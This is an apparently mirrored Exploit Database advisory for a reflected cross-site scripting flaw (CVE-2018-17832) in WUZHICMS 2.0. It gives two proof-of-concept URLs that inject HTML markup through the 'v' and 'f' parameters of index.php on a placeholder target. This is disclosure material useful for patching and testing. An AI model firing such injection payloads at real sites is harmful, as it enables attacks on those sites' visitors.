WUZHICMS 2.0 – Cross-Site Scripting

• Exploit Database
• 136 阅读

• 作者： Renzi
  日期： 2018-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45514/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17

  # Title: WUZHICMS 2.0 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel # Date: 2018-10-01 # Vendor: http://www.wuzhicms.com # Software: WUZHICMS 2.0 # CVE: CVE-2018-17832 # Technical Details & Description: # A Cross Site Scripting vulnerability has been discovered in the WUZHICMS 2.0web-application. # The vulnerability is located in the &apos;v&apos; and&apos;f&apos; parameters of the<code>index.php</code> action GET method request. # PoC   http://Target/index.php?v="><marquee><h1>RENZI</h1></marquee>   http://Target/index.php?f="><marquee><h1>RENZI</h1></marquee>